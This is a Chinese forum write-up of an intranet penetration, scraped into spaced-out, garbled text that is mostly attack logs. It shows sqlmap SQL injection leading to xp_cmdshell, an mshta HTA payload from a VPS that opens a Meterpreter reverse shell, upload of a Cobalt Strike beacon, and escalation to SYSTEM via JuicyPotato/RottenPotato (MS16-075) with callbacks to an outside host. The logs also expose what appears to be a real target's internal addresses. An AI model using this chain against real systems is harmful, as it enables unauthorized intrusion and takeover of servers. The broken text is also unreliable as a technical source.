[18253] 2021-01-08_记一次内网渗透

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-01-08_记一次内网渗透   H A C K   2 0 2 1 - 0 1 - 0 8 s q l m a p s h e l l x p _ c m d s h e l l x p _ c m d s h e l l S q l m a p   - - s q l - s h e l l S q l m a p   - - s q l - s h e l l s q l - s h e l l >   s e l e c t   c o u n t ( * )   f r o m   m a s t e r . d b o . s y s o b j e c t s   w h e r e   x t y p e = ' x '   a n d   n a m e = ' x p _ c m d s h e l l ' [ 2 2 : 0 1 : 3 6 ]   [ I N F O ]   f e t c h i n g   S Q L   S E L E C T   s t a t e m e n t   q u e r y   o u t p u t :   ' s e l e c t   c o u n t ( * )   f r o m   m a s t e r . d b o . s y s o b j e c t s   w h e r e   x t y p e = ' x '   a n d   n a m e = ' x p _ c m d s h e l l ' ' [ 2 2 : 0 1 : 3 6 ]   [ I N F O ]   r e s u m e d :   ' 1 ' s e l e c t   c o u n t ( * )   f r o m   m a s t e r . d b o . s y s o b j e c t s   w h e r e   x t y p e = ' x '   a n d   n a m e = ' x p _ c m d s h e l l ' :   ' 1 ' s q l - s h e l l >   E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E ; [ 0 9 : 4 8 : 0 9 ]   [ I N F O ]   e x e c u t i n g   S Q L   d a t a   e x e c u t i o n   s t a t e m e n t :   ' E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E ' E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E :   ' N U L L '
s q l - s h e l l >   s e l e c t   @ @ s e r v e r n a m e [ 2 3 : 0 2 : 0 4 ]   [ I N F O ]   f e t c h i n g   S Q L   S E L E C T   s t a t e m e n t   q u e r y   o u t p u t :   ' s e l e c t   @ @ s e r v e r n a m e ' [ 2 3 : 0 2 : 0 5 ]   [ I N F O ]   r e t r i e v e d :   ' N E W D A T A B A S E ' s e l e c t   @ @ s e r v e r n a m e :   ' N E W D A T A B A S E ' s q l - s h e l l >   s e l e c t   h o s t _ n a m e ( ) [ 2 3 : 0 2 : 1 9 ]   [ I N F O ]   f e t c h i n g   S Q L   S E L E C T   s t a t e m e n t   q u e r y   o u t p u t :   ' s e l e c t   h o s t _ n a m e ( ) ' [ 2 3 : 0 2 : 2 1 ]   [ I N F O ]   r e t r i e v e d :   ' M A I L ' s e l e c t   h o s t _ n a m e ( ) :   ' M A I L ' S q l m a p   - - o s - s h e l l M s h t a     s h e l l w e b w e b e x e 使 h t a m s f s q l - s h e l l >   e x e c   m a s t e r . . x p _ c m d s h e l l   ' w h o a m i ' [ 0 9 : 4 8 : 5 8 ]   [ I N F O ]   e x e c u t i n g   S Q L   d a t a   e x e c u t i o n   s t a t e m e n t :   ' e x e c   m a s t e r . . x p _ c m d s h e l l   ' w h o a m i ' ' e x e c   m a s t e r . . x p _ c m d s h e l l   ' w h o a m i ' :   ' N U L L ' w e b   s e r v e r   o p e r a t i n g   s y s t e m :   W i n d o w s   8 . 1   o r   2 0 1 2   R 2 w e b   a p p l i c a t i o n   t e c h n o l o g y :   A S P . N E T ,   M i c r o s o f t   I I S   8 . 5 ,   A S P b a c k - e n d   D B M S :   M i c r o s o f t   S Q L   S e r v e r   2 0 1 2     ~   s q l m a p   - r   / U s e r s / a p p l e / D e s k t o p / 1 . t x t   - - o s - s h e l l
m a f [ * ]   i p       h t a _ s e r v e r   -   D e l i v e r i n g   P a y l o a d [ * ]   S e n d i n g   s t a g e   ( 1 7 5 1 7 4   b y t e s )   t o   i p [ * ]   M e t e r p r e t e r   s e s s i o n   1   o p e n e d   ( v p s _ i p : 4 4 4 4   - >   i p : 6 1 9 1 5 )   a t   2 0 2 0 - 1 2 - 0 4   1 0 : 0 1 : 4 2   + 0 8 0 0 m s f 6   e x p l o i t ( w i n d o w s / m i s c / h t a _ s e r v e r )   >   s e s s i o n s   - l A c t i v e   s e s s i o n s = = = = = = = = = = = = = = =     I d     N a m e     T y p e                                           I n f o r m a t i o n                                                 C o n n e c t i o n     - -     - - - -     - - - -                                           - - - - - - - - - - -                                                 - - - - - - - - - -     1                   m e t e r p r e t e r   x 8 6 / w i n d o w s     N T   S e r v i c e M S S Q L S E R V E R   @   D A T A B A S E     v p s _ i p : 4 4 4 4   - >   i p : 6 1 9 1 5   ( 1 0 . 1 0 . 1 0 . 5 ) m s f 6   e x p l o i t ( w i n d o w s / m i s c / h t a _ s e r v e r )   >   s e s s i o n s   - i   1 [ * ]   S t a r t i n g   i n t e r a c t i o n   w i t h   1 . . . m s f 6   e x p l o i t ( w i n d o w s / m i s c / h t a _ s e r v e r )   >   r u n [ * ]   E x p l o i t   r u n n i n g   a s   b a c k g r o u n d   j o b   0 . [ * ]   E x p l o i t   c o m p l e t e d ,   b u t   n o   s e s s i o n   w a s   c r e a t e d . [ * ]   S t a r t e d   r e v e r s e   T C P   h a n d l e r   o n   1 . 1 . 1 . 1 : 4 4 4 4   [ * ]   U s i n g   U R L :   h t t p : / / 0 . 0 . 0 . 0 : 8 0 8 0 / 8 H G L r G 4 7 O U E J . h t a [ * ]   L o c a l   I P :   h t t p : / / v p s : 8 0 8 0 / 8 H G L r G 4 7 O U E J . h t a [ * ]   S e r v e r   s t a r t e d . m s h t a . e x e   h t t p : / / v p s : 8 0 8 0 / 8 H G L r G 4 7 O U E J . h t a
m e t e r p r e t e r   >   s y s i n f o C o m p u t e r                 :   D A T A B A S E O S                             :   W i n d o w s   2 0 1 2   R 2   ( 6 . 3   B u i l d   9 6 0 0 ) . A r c h i t e c t u r e         :   x 6 4 S y s t e m   L a n g u a g e   :   z h _ T W D o m a i n                     :   W E G O L o g g e d   O n   U s e r s   :   1 4 M e t e r p r e t e r           :   x 8 6 / w i n d o w s s h e l l C : W i n d o w s s y s t e m 3 2 > c h c p   6 5 0 0 1
C : W i n d o w s s y s t e m 3 2 > i p c o n f i g   / a l l i p c o n f i g   / a l l W i n d o w s   I P   C o n f i g u r a t i o n       H o s t   N a m e   .   .   .   .   .   .   .   .   .   .   .   .   :   d a t a b a s e       P r i m a r y   D n s   S u f f i x     .   .   .   .   .   .   .   :   x x . x x . x   x . x x       N o d e   T y p e   .   .   .   .   .   .   .   .   .   .   .   .   :   H y b r i d       I P   R o u t i n g   E n a b l e d .   .   .   .   .   .   .   .   :   N o       W I N S   P r o x y   E n a b l e d .   .   .   .   .   .   .   .   :   N o       D N S   S u f f i x   S e a r c h   L i s t .   .   .   .   .   .   :   x x . x x . x   x . x x E t h e r n e t   a d a p t e r   N I C 2 :       M e d i a   S t a t e   .   .   .   .   .   .   .   .   .   .   .   :   M e d i a   d i s c o n n e c t e d       C o n n e c t i o n - s p e c i f i c   D N S   S u f f i x     .   :         D e s c r i p t i o n   .   .   .   .   .   .   .   .   .   .   .   :   B r o a d c o m   N e t X t r e m e   G i g a b i t   E t h e r n e t   # 4       P h y s i c a l   A d d r e s s .   .   .   .   .   .   .   .   .   :   1 0 - 9 8 - 3 6 - B 0 - E D - A E       D H C P   E n a b l e d .   .   .   .   .   .   .   .   .   .   .   :   N o       A u t o c o n f i g u r a t i o n   E n a b l e d   .   .   .   .   :   Y e s E t h e r n e t   a d a p t e r   N I C 1 :       C o n n e c t i o n - s p e c i f i c   D N S   S u f f i x     .   :         D e s c r i p t i o n   .   .   .   .   .   .   .   .   .   .   .   :   B r o a d c o m   N e t X t r e m e   G i g a b i t   E t h e r n e t   # 3       P h y s i c a l   A d d r e s s .   .   .   .   .   .   .   .   .   :   1 0 - 9 8 - 3 6 - B 0 - E D - A D       D H C P   E n a b l e d .   .   .   .   .   .   .   .   .   .   .   :   N o       A u t o c o n f i g u r a t i o n   E n a b l e d   .   .   .   .   :   Y e s       I P v 4   A d d r e s s .   .   .   .   .   .   .   .   .   .   .   :   1 0 . 1 0 . 1 0 . 5 ( P r e f e r r e d )         S u b n e t   M a s k   .   .   .   .   .   .   .   .   .   .   .   :   2 5 5 . 2 5 5 . 2 5 4 . 0       D e f a u l t   G a t e w a y   .   .   .   .   .   .   .   .   .   :   1 0 . 1 0 . 1 0 . 2 5 4       D N S   S e r v e r s   .   .   .   .   .   .   .   .   .   .   .   :   1 0 . 1 0 . 1 0 . 3                                                                               1 0 . 1 0 . 1 0 . 2       N e t B I O S   o v e r   T c p i p .   .   .   .   .   .   .   .   :   E n a b l e d
D N S m s f 使 m s f D N S   S e r v e r s   .   .   .   .   .   .   .   .   .   .   .   :   1 0 . 1 0 . 1 0 . 3                                                                               1 0 . 1 0 . 1 0 . 2 C : W i n d o w s s y s t e m 3 2 > w h o a m i w h o a m i n t   s e r v i c e m s s q l s e r v e r s y s t e m i n f o
m s f 6   >   u s e   p o s t / m u l t i / r e c o n / l o c a l _ e x p l o i t _ s u g g e s t e r m s f 6   p o s t ( m u l t i / r e c o n / l o c a l _ e x p l o i t _ s u g g e s t e r )   >   r u n [ * ]   1 0 . 1 0 . 1 0 . 5   -   C o l l e c t i n g   l o c a l   e x p l o i t s   f o r   x 8 6 / w i n d o w s . . . [ * ]   1 0 . 1 0 . 1 0 . 5   -   3 5   e x p l o i t   c h e c k s   a r e   b e i n g   t r i e d . . . [ + ]   1 0 . 1 0 . 1 0 . 5   -   e x p l o i t / w i n d o w s / l o c a l / b y p a s s u a c _ e v e n t v w r :   T h e   t a r g e t   a p p e a r s   t o   b e   v u l n e r a b l e . n i l   v e r s i o n s   a r e   d i s c o u r a g e d   a n d   w i l l   b e   d e p r e c a t e d   i n   R u b y g e m s   4 [ + ]   1 0 . 1 0 . 1 0 . 5   -   e x p l o i t / w i n d o w s / l o c a l / i k e e x t _ s e r v i c e :   T h e   t a r g e t   a p p e a r s   t o   b e   v u l n e r a b l e . [ + ]   1 0 . 1 0 . 1 0 . 5   -   e x p l o i t / w i n d o w s / l o c a l / m s 1 6 _ 0 3 2 _ s e c o n d a r y _ l o g o n _ h a n d l e _ p r i v e s c :   T h e   s e r v i c e   i s   r u n n i n g ,   b u t   c o u l d   n o t   b e   v a l i d a t e d . [ + ]   1 0 . 1 0 . 1 0 . 5   -   e x p l o i t / w i n d o w s / l o c a l / m s 1 6 _ 0 7 5 _ r e f l e c t i o n :   T h e   t a r g e t   a p p e a r s   t o   b e   v u l n e r a b l e . [ + ]   1 0 . 1 0 . 1 0 . 5   -   e x p l o i t / w i n d o w s / l o c a l / m s 1 6 _ 0 7 5 _ r e f l e c t i o n _ j u i c y :   T h e   t a r g e t   a p p e a r s   t o   b e   v u l n e r a b l e . [ * ]   P o s t   m o d u l e   e x e c u t i o n   c o m p l e t e d 使 m s f e x e ( ) c s h t t p s : / / g i t h u b . c o m / s c a n f s e c / A g g r e s s o r C N A / b l o b / m a s t e r / r e f l e c t i v e J u i c y P o t a t o / j u i c y p o t a t o . c n m s 1 6 _ 0 7 5 m e t e r p r e t e r   >   u p l o a d   / t m p / b e a c o n . e x e   C : / W i n d o w s / T e m p
使 s h e l l s y s t e m m s s q l s y s t e m m s s q l 线 b e a c o n >   e l e v a t e   j u i c y p o t a t o   h t t p [ * ]   T a s k   B e a c o n   t o   r u n   w i n d o w s / b e a c o n _ h t t p / r e v e r s e _ h t t p   ( 1 . 1 . 1 . 1 : 7 7 7 7 )   v i a   J u i c y P o t a t o   ( m s 1 6 - 0 7 5 ) [ + ]   h o s t   c a l l e d   h o m e ,   s e n t :   5 9 9 6 1 8   b y t e s [ + ]   r e c e i v e d   o u t p u t : . [ + ]   r e c e i v e d   o u t p u t : . . [ + ]   r e c e i v e d   o u t p u t : . . [ + ]   r e c e i v e d   o u t p u t : . [ + ]   r e c e i v e d   o u t p u t : [ + ]   a u t h r e s u l t   0 [ * ]   { 4 9 9 1 d 3 4 b - 8 0 a 1 - 4 2 9 1 - 8 3 b 6 - 3 3 2 8 3 6 6 b 9 0 9 7 } ; N T   A U T H O R I T Y S Y S T E M [ + ]   C r e a t e P r o c e s s W i t h T o k e n W   O K h t t p s : / / g i t h u b . c o m / D e E p i n G h 0 s t / E r e b u s [ * ]   T a s k   B e a c o n   t o   r u n   w i n d o w s / b e a c o n _ h t t p / r e v e r s e _ h t t p   ( 1 . 1 . 1 . 1 : 7 7 7 7 )   v i a   R o t t e n P o t a t o   ( m s 1 6 - 0 7 5 ) [ * ]   T a s k e d   b e a c o n   t o   s p a w n   N T L M   D C O M - > R P C   N T L M   R e f l e c t i o n   ( M S 1 6 - 0 7 5 ) [ + ]   h o s t   c a l l e d   h o m e ,   s e n t :   2 5 6 8 6 5   b y t e s
使 b e a c o n a d m i n i s t r a t o r g o o d   b e a c o n >   s h e l l   w h o a m i [ * ]   T a s k e d   b e a c o n   t o   r u n :   w h o a m i [ + ]   h o s t   c a l l e d   h o m e ,   s e n t :   3 7   b y t e s [ + ]   r e c e i v e d   o u t p u t : n t   s e r v i c e m s s q l s e r v e r b e a c o n >   g e t u i d [ * ]   T a s k e d   b e a c o n   t o   g e t   u s e r i d [ + ]   h o s t   c a l l e d   h o m e ,   s e n t :   8   b y t e s [ * ]   Y o u   a r e   N T   A U T H O R I T Y S Y S T E M   ( a d m i n ) b e a c o n
b e a c o n >   s h e l l   n e t   l o c a l g r o u p [ * ]   T a s k e d   b e a c o n   t o   r u n :   n e t   l o c a l g r o u p [ + ]   h o s t   c a l l e d   h o m e ,   s e n t :   4 5   b y t e s [ + ]   r e c e i v e d   o u t p u t : D A T A B A S E   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - * A c c e s s   C o n t r o l   A s s i s t a n c e   O p e r a t o r s * A d m i n i s t r a t o r s * B a c k u p   O p e r a t o r s * C e r t i f i c a t e   S e r v i c e   D C O M   A c c e s s * C r y p t o g r a p h i c   O p e r a t o r s * D i s t r i b u t e d   C O M   U s e r s * E v e n t   L o g   R e a d e r s * G u e s t s * H e l p L i b r a r y U p d a t e r s * H y p e r - V   A d m i n i s t r a t o r s * I I S _ I U S R S * N e t w o r k   C o n f i g u r a t i o n   O p e r a t o r s * P e r f o r m a n c e   L o g   U s e r s * P e r f o r m a n c e   M o n i t o r   U s e r s * P o w e r   U s e r s * P r i n t   O p e r a t o r s * R D S   E n d p o i n t   S e r v e r s * R D S   M a n a g e m e n t   S e r v e r s * R D S   R e m o t e   A c c e s s   S e r v e r s * R e m o t e   D e s k t o p   U s e r s * R e m o t e   M a n a g e m e n t   U s e r s * R e p l i c a t o r * S Q L S e r v e r 2 0 0 5 S Q L B r o w s e r U s e r $ N E W D A T A B A S E * S Q L S e r v e r M S A S U s e r $ N E W D A T A B A S E $ M S S Q L S E R V E R * U s e r s * W i n R M R e m o t e W M I U s e r s _ _
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则